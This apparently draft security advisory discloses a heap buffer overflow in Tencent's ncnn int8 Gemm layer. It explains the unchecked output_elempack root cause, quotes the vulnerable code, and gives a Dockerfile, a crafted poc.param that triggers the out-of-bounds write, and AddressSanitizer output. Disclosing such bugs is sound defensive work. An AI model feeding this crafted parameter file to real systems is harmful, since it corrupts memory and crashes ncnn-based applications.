All advisories
Draft

Heap Buffer Overflow in Weight-Only Int8 GEMM

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Overflow in Weight-Only Int8 GEMM

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/gemm_wq_int8.h:10868 in unpack_output_tile_wq_int8
Sanitizer verdict: heap-buffer-overflow

Summary

A crafted .param file that declares a weight-only int8 Gemm layer with an output_elempack that does not divide the output height makes ncnn allocate an output tensor several times smaller than the tile-unpacking code writes, producing a native heap out-of-bounds write that terminates the process. The entry point is any workflow that loads the parameter file through ncnn::Net::load_param(); the supplied PoC uses ncnnoptimize, which reaches the layer during ModelWriter::shape_inference(). No weight file is required — ncnnoptimize accepts the literal null bin path. The overflow writes attacker-influenced float data past the end of a pooled heap allocation.

Detail

The untrusted field is output_elempack, parameter id 12 of the Gemm layer. Gemm::load_param() reads it and validates only that it is not negative; there is no check that it divides the output height M, and no upper bound at all.

Gemm_x86::forward_wq_int8() then uses that raw value as the output packing factor and sizes the output tensor with the truncating division M / out_elempack. The tile unpacker, however, still walks all M logical rows, addressing them through out_hstep, which for a 2-D output is just top_blob.w:

// src/layer/gemm.cpp:262
    output_elempack = pd.get(12, 0);
// src/layer/gemm.cpp:274
    if (output_elempack < 0)
    {
        NCNN_LOGE("Gemm invalid output_elempack %d", output_elempack);
        return -1;
    }

// src/layer/x86/gemm_x86.cpp:9909
    if (output_elempack)
        out_elempack = output_elempack;
    size_t out_elemsize = (output_elemtype == 1 ? 4u : 2u) * out_elempack;
// src/layer/x86/gemm_x86.cpp:9926
            top_blob.create(N, M / out_elempack, out_elemsize, out_elempack, opt.blob_allocator);

// src/layer/x86/gemm_wq_int8.h:6600
    const size_t out_hstep = top_blob.dims == 3 ? top_blob.cstep : (size_t)top_blob.w;
// src/layer/x86/gemm_wq_int8.h:6631
            p0f = (float*)top_blob + (i + ii) * out_hstep + j * out_elempack;

// src/layer/x86/gemm_wq_int8.h:10866
                else
                {
                    p0f[0] = f00;
                    p0f[out_hstep] = f10;
                    p0f++;
                }

The PoC declares M=63, N=1, K=32, output_elemtype=1, non-transposed output and output_elempack=32. M / out_elempack truncates 63/32 to 1, so top_blob.create(1, 1, 128, 32) reserves a single packed row — 32 floats, 128 bytes of payload, which ASan sees as the 196-byte region (128 bytes of data plus the reference count and ncnn's fixed over-read padding).

unpack_output_tile_wq_int8() is invoked with max_ii derived from the true M, so i + ii reaches 62 while out_hstep is top_blob.w == 1. The store pair p0f[0] = f00; p0f[out_hstep] = f10; at line 10868 therefore writes at float offsets far beyond the 32 floats that were allocated; ASan catches the write 44 bytes past the end of the region and aborts.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-weight-only-int8-gemm && cd ncnn-poc-heap-buffer-overflow-in-weight-only-int8-gemm

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
2 2
Input input 0 1 input 0=32 1=63
Gemm gemm 1 1 input output 3=1 5=1 8=1 9=32 12=32 18=800
PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x512000000130 at pc 0x600d78f1f471 bp 0x7fff0c657070 sp 0x7fff0c657060
WRITE of size 4 at 0x512000000130 thread T0
    #0 0x600d78f1f470 in unpack_output_tile_wq_int8 /ncnn/src/layer/x86/gemm_wq_int8.h:10868
    #1 0x600d78f53e5b in gemm_BT_x86_wq_int8 /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:9692
    #2 0x600d78f6d3c6 in ncnn::Gemm_x86_avx512::forward_wq_int8(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:9931
    #3 0x600d78baab0e in ncnn::Gemm_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7605
    #4 0x600d724bd70b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #5 0x600d724a5b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #6 0x600d725059e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #7 0x600d723973c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #8 0x600d72414eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #9 0x7e9e2a1871c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x7e9e2a18728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x600d72394624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x512000000130 is located 44 bytes after 196-byte region [0x512000000040,0x512000000104)
allocated by thread T0 here:
    #0 0x7e9e2a800f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x600d7242968e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x600d7242968e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x600d724684b8 in ncnn::Mat::create(int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:539
    #4 0x600d78f6cfeb in ncnn::Gemm_x86_avx512::forward_wq_int8(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:9926
    #5 0x600d78baab0e in ncnn::Gemm_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7605
    #6 0x600d724bd70b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #7 0x600d724a5b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #8 0x600d725059e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #9 0x600d723973c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #10 0x600d72414eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #11 0x7e9e2a1871c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x7e9e2a18728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #13 0x600d72394624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/x86/gemm_wq_int8.h:10868 in unpack_output_tile_wq_int8

Credit

Zheng Yu @ DepthFirst